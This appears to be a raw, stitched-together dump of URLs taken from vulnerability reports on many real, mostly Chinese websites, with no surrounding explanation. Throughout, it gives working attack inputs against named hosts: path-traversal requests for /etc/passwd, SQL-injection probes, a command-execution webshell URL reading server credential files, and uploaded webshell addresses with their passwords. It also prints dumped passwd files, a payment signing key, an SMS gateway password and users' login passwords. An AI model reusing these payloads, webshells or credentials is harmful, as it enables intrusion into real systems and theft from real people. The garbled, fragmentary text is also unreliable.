http://**.**.**.**/index/tender/indexTender!queryBulletinPage.do http://www.tofer.com.cn http://tofer.yili.com/ http://tofer.yili.com/admin http://waiyu.nchu.edu.cn/gk.asp?page=7&ajtype=jsfc http://v.higo.meilishuo.com/shop/Get_group_detail http://stores.**.**.**.**:8090/storesB2C/main.shtml http://**.**.**.**/zsdr/login.jsp http://www.chinaanhe.com/ http://121.40.166.230:10021/plugins/?q=area&area_id=-1 http://121.40.166.230:10021/?ask&status=%273 
http://121.40.166.230:10021/index.php?user&q=code/borrow/gathering&status=0'&page= http://121.40.166.230:10021/creditshop/main.html?classid=&price=0,1000'&order= http://m.yaofangwang.com/app/Reset_mobile.aspx?mobile=18888888888 www.moneydai.com/Touzi/index/pt/我是注入点/qi/0/p/2.html http://www.chinaanhe.com/anli/index.html http://www.chuangjucf.com http://www.6scf.com http://www.dyk.com.cn/service/serviceacitivitieinto?id=10007 http://zc.testin.cn http://www.hddznet.com/ http://www.hddznet.com/performance-160-410.html http://mail.10jqka.com.cn:88/cgi-bin/test-cgi http://mx2.10jqka.com.cn:88/cgi-bin/test-cgi http://mx3.10jqka.com.cn:88/cgi-bin/test-cgi http://220.189.211.9:88/cgi-bin/test-cgi http://mx1.10jqka.com.cn:88/cgi-bin/test-cgi http://210.51.244.169:88/cgi-bin/test-cgi http://218.108.90.233:88/cgi-bin/test-cgi http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 
http://**.**.**.**/datacenter/global/login.do?bg=../../../../../../../etc/passwd%00 http://person.sac.net.cn/pages/train/sg-train-teacher-login.html http://person.sac.net.cn/pages/train/train-line-register!search.action http://cmxy.gzmu.edu.cn/article_StudentWork.php?op=StudentWork&id=3591 http://cube.xialaile.cn http://admin.xialaile.cn https://www.yuancredit.com/cust/verifyCode http://pay.th010.com/ http://pay.th010.com http://www.chinaiiss.com/do.php?do=user&p1=getpass&uid=999900&id=83adSsKK6Y http://www.wanda.cn/ http://**.**.**.**/hykg//sys/Login_dologin.action http://**.**.**/js/ https://github.com/LyonWong/Framework-LY/blob/aea17fc85bc5667a9c7408c089d6c2b6933a658c/config/.conf/email.php http://wooyun.org/bugs/wooyun-2015-0129958,这些都是app的接口,其中一个应用是理邦微品,下载地址http://appshopper.com/lifestyle/%E7%90%86%E9%82%A6%E5%BE%AE%E5%93%81%E4%BC%9A,有官方下载地址,vpclub.cn下的,忘了在哪去了。。。 http://app.vpclub.cn/api/1.0/StoreServer/Store/GainCustomer http://**.**.**.**/ http://**.**.**.**/yonghu.html http://**.**.**.**/cp/glis90.html http://221.11.48.169:8080/yyoa/ http://bbs.dapu.com/ http://bbs.dapuhome.com/ http://mail.dapu.com/ http://ocs.dapu.com/ http://dapubaby.tmall.com http://www.cnrmall.com/,下个app注册 http://m.cnrmall.com/user/userinfo.jsp?userid=10500011 http://www.bcda.gov.cn/detail.asp?id=7036 http://**.**.**.**/admin/editor/Example/NewsSystem/NewsFile/20158511377158.asp http://**.**.**.**/MagazineBookList.aspx?typeid=4 http://oa.glsc.com.cn:10040/wps/portal http://adma.ustb.edu.cn/szdw.asp?fid=208&id=468 http://adma.ustb.edu.cn/szdw.asp?fid=208&id=468 http://sqlmap.org https://**.**.**.**/wayshall/onetwo/blob/dd9604f6251df5e14b080140f39eac0e3277757c/core/plugins/email/src/test/resources/email/mailconfig.properties http://asp.asus.com.cn/login.aspx http://222.73.192.46:8081/ http://222.73.192.46:8081/uploadTemp/ads1438861038189113272.PHP root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin 
sync:x:5:0:sync:/sbin:/bin/sync mail:x:8:12:mail:/var/spool/mail:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin htt:x:100:103:IIIMF Htt:/usr/lib64/im:/sbin/nologin ztsafe:x:0:0::/home/ztsafe:/bin/bash apache:x:500:500::/home/apache:/bin/bash mysql:x:501:501::/home/mysql:/bin/bash duduftp:x:500:500::/usr/local/apache2/:/sbin/nologin http://58.215.164.127/ http://58suyun.58.com/ http://tmsbj.century21cn.com:8010/Login.aspx http://tmsbj.century21cn.com:8010/instancedetail.aspx?instanceid=b11e032f-f225-4f59-9649-0509942658be&expandpath=&&pageaction=close&emp_cd=bj40458 http://tmsbj.century21cn.com:8010/TPM/CommissionConfirm/CommissionConfirmForm.aspx?Mode=View&WorkItemID=c98aa58e-b1af-4357-9387-216ee3b4b5d8&LoginName=&LoginPassword= http://tmsbj.century21cn.com:8010/EditUser.aspx?Mode=View&ID=aeaf2788-ef5e-4b4f-9a1d-32522ce98859&ExpandPath=&&PageAction=Close http://tmsbj.century21cn.com:8010/EditUser.aspx?Mode=View&ID=67d833ab-1395-4a78-b066-fc785cad256e&ExpandPath=&&PageAction=Close http://tmsbj.century21cn.com:8010/UploadFile/2014-05/BJB2663140505/80b3a2f8-33ae-4b21-b16c-b8708eabf679.pdf 
http://tmsbj.century21cn.com:8010/uploadfile/2014-01/bjb306140102/ee3e4047-b12d-4c90-9874-40ff17a7f964.pdf http://cs.sicnu.edu.cn/ http://cms.huazhu.com http://**.**.**/NanTian/ http://wooyun.org/bugs/wooyun-2015-0131339 https://29ab43d962**********c0480b3ed157687:x-oauth-basic@github.com/baixing/jucheshang_admin http://cartier.baixing.cn/pull.php更新到线上 http://www.cs12333.com:8080/cstykj/flex/Index.html www.chinaiiss.com http://**.**.**/ http://**.**.**/jxjs/ http://**.**.**/jxjs/wisjsp/feedback_yingluoshi_yy.jsp=343316&jigou_layer=3&shifouyyjl=3&ying_ls=ying_ls http://117.41.251.132/jxjs/wisjsp/public_show_manager_yy.jsp?feedbackid=200763&shifouyyjl=3&shifoumanager=shifoumanager http://117.41.251.133:8080/VillageReport/ http://**.**.**/VillageReport/byjyAction.domethod=selectDetailInfo&isEdit=0&shFlg=1&msgId=182104 http://58.251.8.107/m1/login.do http://www.unicomlabs.com/home.jsp android:configChanges="keyboardHidden|orientation android:exported="true android:launchMode="singleTop android:name=".ProductUsageShowActivity android:screenOrientation="portrait"/ http://**.**.**.**:9085/ServiceAction/com.eweaver.base.security.servlet.LoginAction?action=getLabelNameByKeyId&keywordid=402881e43c2385f6013c2385f6720002&language=zh_CN&labelParams= http://shyysh.spta.cn:8080/ http://**.**.**/app/modifyApp.actionappID=25 http://www.10jqka.com.cn:80/modules.php?file=logout&name=trade&placeholder=1 http://www.10jqka.com.cn:80/modules.php?file=logout&name=trade http://www.10jqka.com.cn:80/modules.php?file=logout&name=trade http://222.82.211.198:8082/index.php?s=/public/login http://mail.citicsinfo.com/ http://mail.citicsinfo.com/names.nsf http://221.10.101.85:8080/Default.aspx http://gamemanager.uqee.com/allOperFeedBack_10_1.html http://gamemanager.uqee.com/operator.html http://gamemanager.uqee.com/allOperFeedBack_10_1.html http://60.220.226.210:8080/ http://60.220.226.210:8080/LbDataBaseLoginTestPage.aspx 
http://url/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd http://app.homsee.com/againset_mima.aspx?deAcc=xxx http://app.homsee.com/admin/Mangermang/Main.aspx http://www.gzxbm.cn/001/ http://www.gzxbm.cn/002/ http://www.gzxbm.cn/003/ http://www.gzxbm.cn/004/ http://www.gzxbm.cn/010/ http://www.gzxbm.cn/001/page_main/att/AttAddFrm.jsp?AID=mail&DOCID=1&FLOWID=mail&TYPE=3 http://g.corp.gome.com.cn/mtms/login.do inurl:login_form.jsp http://**.**.**.**:8082/finance_hc/reports/upload_template.jsp http://sae.sina.com.cn/?m=apps&a=create http://drops.wooyun.org/papers/831 http://www.flyertea.com/credit/index.php/Index/index.html?condition=11-0&code=&name= http://58suyun.58.com/pc/suyun/orderdetail?orderid=629493083318403072 home.nsf/tomailsmart可直接进入管理后台 http://10.60.1.62/ http://10.60.3.6/ http://10.60.3.18/ http://10.60.1.125/zh_cn/ http://10.60.3.69/ http://10.60.18.100/ http://10.60.20.2/到http://10.60.20.72 http://10.60.3.243 http://10.60.21.35/ http://huawei.hiall.com.cn/ http://**.**.**.**/top/2015cimt/news_t_view.html?id=468516 http://**.**.**.**/top/2015cimt/news_t_view.html?id=468516 http://**.**.**.** http://**.**.**.**/bugs/wooyun-2010-057096 http://ip/cgi-bin/webif/Objset-users.sh?edituser=edituser&id=5,我们将id=5改为id=4,然后访问,就会到telecomadmin这个用户的管理界面,然后查看网页的源代码就会看到telecomadmin的密码了,重新用telecomadmin登录,就可以完全控制网关了。 https://202.202.32.77 http://tra.st119.org:8082/firefighting/loginAction!login.shtml http://221.2.233.10:8888/login.aspx http://100inn.cc/Passport/ForgetPassword.aspx http://**.**.**.**/bugs/wooyun-2010-0131319 http://ip/dlp/userReg/pushSetup.do?setupName=asdasd http://www2.cmu.edu.tw/~cmu4c/2010/review/detail.php?id=473 http://www.idoup.com/prepare/redirect.action存在命令执行 http://www.idoup.com/prepare/ http://www.skg.com/storefront/member/toEmailUpdatePwd.htm?gensid=470001770110785 http://www.skg.com/storefront/member/toEmailUpdatePwd.htm?gensid=470001770111364 
http://www.skg.com/storefront/member/toEmailUpdatePwd.htm?gensid=470001770111384 http://www.skg.com/storefront/member/toEmailUpdatePwd.htm?gensid=470001770111988 http://**.**.**.**/borrow/Child?pid=4 http://**.**.**.**/userTrade/changeConsultant?keyword= http://bus.gpsoo.net http://cmu4c.cmu.edu.tw/2011/review/detail.php?id=1159 http://htdata2.qq.com/cgi-bin/httpconn?htcmd=0x6ff0080&u=http://ww.baidu.com/link?url=6Mz79LQyCsoHrjnRijPYzHqjIwfGzkdAjaRShJTPLQMcglQGg22aa9Mz8ipfpftP&wd=&eqid=c1558f51000079ee0000000555c103aa http://58.250.171.39/zecmd/zecmd.jsp http://58.250.171.39/zecmd/zecmd.jsp?comment=cat%20+%2Fapp%2Fstud%2Fjboss-4.0.4.GA/server/default/conf/props/jmx-console-users.properties admin.php/website/check http://renshi.caas.net.cn/admin_login.asp http://renshi.caas.net.cn/Z_List.asp?ParentClassName=1 http://renshi.caas.net.cn/database/ http://**.**.**.** http://**.**.**.**/storefront/ou/findAddr.htm?id=460000052580966&_=1438918372562 http://**.**.**.**/storefront/ec/so/toOrderDetail.htm?soNo=2015080700586 inurl:cart.jsp?id= http://**.**.**.**/site/cart.jsp?uid=10036&id=aknp2928vc38jjul http://**.**.**.**/site/cart.jsp?uid=10036'&id=aknp2928vc38jjul http://**.**.**.**/500.jsp?message=java.lang.Exception%3A+java.lang.Exception%3A+com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException%3A+Unknown+column+%2710036%C3%A2%E2%82%AC%CB%9C%27+in+%27where+clause%27 http://www.flyertea.com/comment/Mobile/promotionSearch?bigtype_fid=&bigtype_id=141 http://dct.nctu.edu.tw/page.php?id=69 http://www.tuodong.com/hqms/indexAction!login.action http://www.tuodong.com/hqms_gx/indexAction!exit.action http://www.tuodong.com//bhz_jx/loginAction!userLogin.action http://www.tuodong.com//bhz_ly//loginAction!userLogin.action http://www.tuodong.com/bhz_wh/loginAction!userLogin.action http://www.tuodong.com/hqms_hn/indexAction!exit.action http://www.tuodong.com/hqms_sx/indexAction!login.action http://www.tuodong.com/tms_ly/loginAction!isLogin.action 
http://www.tuodong.com/tms_sc/loginAction!isLogin.action http://www.tuodong.com/td/IndexAction!indexLoad.action http://www.tuodong.com/td/qwe.jsp http://115.28.16.113:27000/loginAction root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash cri702:x:500:500::/alidata/home/cri702:/bin/bash cri703:x:501:501::/alidata/home/cri703:/bin/bash demo72:x:502:502::/alidata/home/demo72:/bin/bash gunai:x:503:503::/alidata/home/gunai:/bin/bash haiyangzhixing:x:504:504::/alidata/home/haiyangzhixing:/bin/bash huating:x:505:505::/alidata/home/huating:/bin/bash sale:x:506:506::/alidata/home/sale:/bin/bash xiaoshou:x:507:507::/alidata/home/xiaoshou:/bin/bash nginx:x:508:508::/alidata/home/nginx:/bin/bash tssvip:x:509:509::/alidata/home/tssvip:/bin/bash tss:x:510:510::/alidata/home/tss:/bin/bash salepms:x:511:511::/alidata/home/salepms:/bin/bash salekfgj:x:512:512::/alidata/home/salekfgj:/bin/bash shuijing:x:513:513::/alidata/home/shuijing:/bin/bash cri73:x:514:514::/alidata/home/cri73:/bin/bash futai:x:515:515::/alidata/home/futai:/bin/bash shuijingcri:x:516:516::/alidata/home/shuijingcri:/bin/bash 
http://**.**.**.**/bugs/wooyun-2015-0116232 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://wap.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60 http://wphone.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60 http://symbian.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60 http://android.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60 http://user.andaijia.com/user/code?build=6.3&hash=xxxxxxxx&time=1438919595&user_mobile=18812341234&ver=a1.3 http://i1.zastatic.com/imwap/app/za.apk?ap http://user.qmango.com/ajax/ajax_qmsearch_new.asp?cityid=@@version&cityname=%u9752%u5C9B&keywords=%u7B2C%u4E00%u6D77%u6C34%u6D74%u573A http://**.**.**.**北京大学出版社 webshell:http://**.**.**.**/forum/data/2381382_.cfm?o=login密码adobe123 http://**.**.**.**/editor/popups/fileupload.cfm?sObj=sFileNamePath http://**.**.**.**/upload/2015/08/07/20150807095234969.cfm http://**.**.**.**/forum/data/2381382_.cfm?o=login http://**.**.**.** http://**.**.**.**/ http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.ncsjj.gov.cn/ http://cgs.ncsjj.gov.cn/ http://a221hc.changba.com/.svn/entries http://a219hc.changba.com/.svn/entries http://a220hc.changba.com/.svn/entries http://pushdx.dnion.com/ http://**.**.**/zk/contentmanager/currentCacheIpQuery.zul http://ws.montnets.com:9002/MWGate/wmgw.asmx/MongateCsSpSendSmsNew?userId=J00275&password=187523&pszMobis=15200009999&pszMsg=test&pszSubPort=1065712038002984 https://payments.changbashow.com/live/payment/aliJiJianZhiFu/notify_url.php http://**.**.**.**/ShowDetail.php?DEPCODE=1 http://**.**.**.**/bugs/wooyun-2015-0114051 http://**.**.**.**/index.php/Index/Cate http://**.**.**.** http://report.renrenche.com/ http://report.renrenche.com/?proc=2&resource=../../../../../../../etc/passwd http://mail.yili.com/ http://**.**.**.**/column2.jsp?funid=0&colid=18480 http://vote1.ynet.com/vote/Statistics.jsp?vsVoteId=21588 
http://202.100.80.9/invoker/EJBInvokerServlet http://hq.fruitday.com:89/login.do http://www.people.com.cn/n/2012/404.js http://app.wumart.com/WMService/WMAppCommWebService.asmx?wsdl http://app.wumart.com/AppHD/WMAppCommWebService.asmx?wsdl http://fj.189.cn http://xshc.sxnu.edu.cn/phy_center_asp/shownews.asp?newsid=630 http://xshc.sxnu.edu.cn/phy_center_asp/admin/ http://**.**.**.**/findpwd.html http://**.**.**.**/hcareer/SocietyAdmin/LIB/Resume/WordEdit.aspx?id=1000 http://hc.nccu.edu.tw/public/view.php?main=3&sub=29&ssub=35&id=220 http://yes.solarbao.com/newslist.aspx?con= http://passport.ciwong.com/ConfirmValidEmail?485652743 http://passport.ciwong.com/ConfirmValidEmail?485652772 http://**.**.**.**/stb/apollo/kxgames/kx/res/images/garden/.svn/entries http://**.**.**.**/ibh/.svn/entries https://sso.sankuai.com/login http://dealer.xcar.com.cn/.ssh/known_hosts http://home.focus.cn/msgview/2456/21781694.html?author_id=1527644 https://jiaofei.alipay.com/market/chargeRemindInfoEntering.htm https://zht.alipay.com/asset/newIndex.htm http://**.**.**.**/cjcx/index.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**/cjcx/index.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**:8000/cjcx/index.aspx http://**.**.**.**/cjcx/index1.asp http://**.**.**.**:8000/cjcx/index.aspx http://**.**.**.**/cjcx/ http://**.**.**.**/cjcx/index.asp http://**.**.**.**/cjcx/ http://**.**.**.**:8000/cjcx/index.aspx http://**.**.**.**/cjcx/index1.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**:8000/cjcx/index.aspx http://**.**.**.**/cjcx/index1.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**/cjcx/index1.asp http://**.**.**.**:8082/cjcx/index1.asp http://kzone.kuwo.cn/mlog/#@ www.123456 www.123456 http://app.hc360.com/?adfr=syerwm http://58.214.240.114:8888 
http://www.flyertea.com/comment/Index/ajaxList/?star_rate=&chain_id=&property_type=&sort=popularity&hotel= http://www.cninsure.net/Enterprise/StoryInfo.aspx?id=9732存在注入 http://www.cninsure.net/Enterprise/StoryInfo.aspx?id=9732%20and%20@@version=1 http://www.cninsure.net/Enterprise/StoryInfo.aspx?id=9732%20and%20user=1 http://ab-insurance.hiall.com.cn/cmd.php http://hxsy.ebh.net/forget/pwd.html?code=d61eeWoxWFhYWFhY&activecode=jO07VySfU9&ut=d61eMTg1MTE1NjEx%3D%3D http://wooyun.org/bugs/wooyun-2015-0123072 http://www.zhiup.cn http://oa.99114.com/ http://oa.99114.com/nullxiao.jsp http://218.29.101.7/defaultroot/upload/information/2015080413082532185869051.jsp密码tom http://www.jinher.com http://demos.jh0101.com/ http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1'waitfor%20delay%20'0:0:3 http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1 http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1'waitfor http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1'waitfor%20delay%20 http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1'waitfor%20delay%20'0:0:5'-- http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1'waitfor%20delay/**/'0:0:5'-- http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1 http://bjoa.avic-intl.cn/ http://121.32.89.133:8001/打开就能看见 http://121.32.89.133:8001/console http://121.32.89.133:8001/wls_Server/a.jsp www.yohobuy.com http://open.lianlianpay.com/ http://www.feiyudai.com/*.txt http://www.feiyudai.com/mob-pay-paynotice.shtml&oid_partner=201501291000196502&risk_item={"user_info_bind_phone":"","user_info_dt_register":"20150130135405","risk_state":"1","frms_ware_category":"1009"}&sign_type=MD5&url_return=http://www.feiyudai.com/mob-pay-payreturn.shtml&valid_order=30&key=dgerg44r***56786523 
http://www.feiyudai.com/mob-pay-paynotice.shtml&oid_partner=201501291000196502&risk_item={"user_info_bind_phone":"","user_info_dt_register":"20150130135410","risk_state":"1","frms_ware_category":"1009"}&sign_type=MD5&url_return=http://www.feiyudai.com/mob-pay-payreturn.shtml&valid_order=30&key=dgerg44rehrthrth56786523 http://www.feiyudai.com/mob-pay-paynotice.shtml&oid_partner=201501291000196502&risk_item={"user_info_bind_phone":"13476089996","user_info_dt_register":"20141017104055","risk_state":"1","frms_ware_category":"1009"}&sign_type=MD5&url_return=http://www.feiyudai.com/mob-pay-payreturn.shtml&user_id=2511&valid_order=30&key=dgerg44rehrthrth56786523 http://www.feiyudai.com/mob-pay-paynotice.shtml&oid_partner=201501291000196502&risk_item={"user_info_bind_phone":"","user_info_dt_register":"20150130135423","risk_state":"1","frms_ware_category":"1009"}&sign_type=MD5&url_return=http://www.feiyudai.com/mob-pay-payreturn.shtml&valid_order=30&key=dgerg44rehrthrth56786523 KEY:dgerg44rehrthrth56786523 http://www.feiyudai.com http://cppmde.com/ http://g.hiphotos.baidu.com/image/pic/item/7c1ed21b0ef41bd5f3bcaf4854da81cb38db3d9a.jpg http://www.libsys.com.cn/download/opac50_20131223.zip http://www.g-film.com/paipian/cinema.asp?tpid=1 www.g-film.com http://**.**.**.**/bugs/wooyun-2015-0114051 http://**.**.**.**/news/details/id/32 http://**.**.**.**/news/details?id=32 http://**.**.**.** http://liuxue.bfsu.edu.cn http://www.schtrust.com/index.php?m=content&c=index&a=show&catid=31&id=5211 http://fishdb.sinica.edu.tw/eng/document_link.php?id=380923&sc=Ostichthys http://bill.szgwbn.net.cn/ http://192.168.8.1/wan_NAT.asp?userLogin.asp http://192.168.8.1/maintain_logs.asp?userLogin.asp http://192.168.8.1/device_remote_manage.asp?userLogin.asp http://192.168.8.1/device_user_manage.asp?userLogin.asp http://192.168.8.1/device_user_manage.asp?userLogin.asp http://192.168.8.1/device_userpass_manage.asp?userLogin.asp http://192.168.8.1/acl_mac_filter.asp?refresh=yes?userLogin.asp 
http://192.168.8.1/acl_appLayer.asp?refresh=yes?userLogin.asp http://192.168.8.1/route_static.asp?refresh=yes?userLogin.asp http://192.168.8.1/wan_new.asp?refresh=yes?userLogin.asp http://192.168.8.1/lan_local_seter.asp?refresh=yes?userLogin.asp http://www.fsxgz.com/info.asp?t=1&s=11&i=326 http://www.fstfpm.com/ins.asp?t=0&s=1&i=1 www.fsjwwl.com(也存在注入) http://219.141.188.23/SumTotal/login.htm inurl:http://wk.yl1001.com/login_password http://wk.yl1001.com/doc_6701369821222755_all.htm?common_login_switch=person&common_login_username=382942055@qq.com&common_login_password=cx13600929167&safe_code= http://wk.yl1001.com/doc_3691346653911996_all.htm?common_login_switch=person&common_login_username=b2b_2008@126.com&common_login_password=asdfyl1001&safe_code= http://wk.yl1001.com/doc_3691377249960377_all.htm?common_login_switch=person&common_login_username=18959101532@163.com&common_login_password=xp198011&safe_code= http://wk.yl1001.com/doc_6881409470532713_all.htm?common_login_switch=person&common_login_username=312104495&common_login_password=1969305zlx1972&safe_code=&rmbUser=on http://**.**.**.**/inter/guanzhu_userdetail_action.asp?Page=2&act=post&username=QQ897032171 http://www.ca-maimai.com/ http://180.96.21.26:99/Home/index.php?m=Index&a=index http://fy.cnxz.com.cn/fy.rar site:m.minshenglife.com/ http://m.minshenglife.com/wm/wx/wxTripSearchBothContDetail.do?aaa=%22+111&openid=opqgIuM_2nsC5UzmKxI5iF8eJpGI http://m.minshenglife.com/wm/wx/wxTripSearchBothContDetail.do?aaa=%22+111&openid=opqgIuHyhwZOxLWrQCsUgG0sJKuc display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none 
display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none http://m.minshenglife.com/wm/wx/wxTripSearchBothContDetail.do?aaa=%22+111&openid=opqgIuEcCgDlDvshXXoS20BR3ric display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none display:none http://gift.airchina.com.cn/AddrInfo.html?&AddressId=630800 http://gift.airchina.com.cn/AddrList.html?&AddressId=630800 http://gift.airchina.com.cn/AddrInfo.html?&AddressId=627367 http://bt.juntu.com/unionPayLog.txt http://bt.juntu.com/.svn/entries http://www.xindaip2p.com/Item/list.asp?id=1485 http://666.xindaip2p.com/xindai/admin http://sh.ziroom.com/ziroomer/activity/?category_id=11 http://www.dfmg.com.cn/EN/NewsDetail.aspx?ID=3238 http://ssp.cninsure.net/ssp/product/center/centerIndexAction.action?channelId=1 http://**.**.**.**/bugs/wooyun-2015-0116480而发 http://**.**.**.**/SubDepartmentInfo.aspx?subid=449 http://**.**.**.**/SubDepartmentInfo.aspx?subid=544 http://**.**.**.**/SubDepartmentInfo.aspx?subid=525 http://**.**.**.**/SubDepartmentInfo.aspx?subid=511 
http://**.**.**.**/SubDepartmentInfo.aspx?subid=1 http://**.**.**.**/SubDepartmentInfo.aspx?subid=532 http://**.**.**.**/PublicQuery/PublicQuery.aspx http://**.**.**.**/PublicQuery/PublicQuery.aspx http://**.**.**.**/PublicQuery/PublicQuery.aspx http://**.**.**.**/PublicQuery/PublicQuery.aspx http://**.**.**.**/PublicQuery/PublicQuery.aspx http://**.**.**.**/PublicQuery/PublicQuery.aspx http://ssp.cninsure.net/ssp/product/center/centerIndexAction.action?channelId=1 http://219.141.188.37 http://**.**.**.**/bugs/wooyun-2010-0103834 http://**.**.**.**/main.asp http://**.**.**.**/bbs/default.asp www.zip http://**.**.**.**/defaultroot/upload/information/2015080323244476070434708.jsp密码tom http://**.**.**.**/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 http://**.**.**/ http://gb.cri.cn/44571/2015/06/10/7872s4992373.htm http://121.40.166.230:10021/ http://www.bbktel.com.cn/Down_AD.php?id=11 http://**.**.**.**/stgl/view.php?id=20 https://github.com/75426585/gsweb/blob/6f4b33498c17e9356bc7593fbadd67e5e0c643d0/hweixin/config/xstest/const.php https://github.com/coolsky600/SSH-Code-Builder/blob/e670199245a17510387ad2951b78b2b8143e74f1/MDD/src/main/resources/appkey.properties http://www.ztesoft.com:808/zsmart/index.php http://www.ztesoft.com:808/upfile/20141226175700_643.php http://oa.gsfp.net/system/ http://www.minanins.com/maechannel/member/userlogin.do?m=y# http://gwact.woniu.com/gather/index/gatherSumNumber?act_id=3 http://gwact.woniu.com/gather/index/gatherSumNumber?act_id=3 http://58.60.230.84/UILoader/Login.aspx http://58.60.230.70/ http://59.36.102.206/defaultroot/upload/information/2015080403015521979999134.jsp 
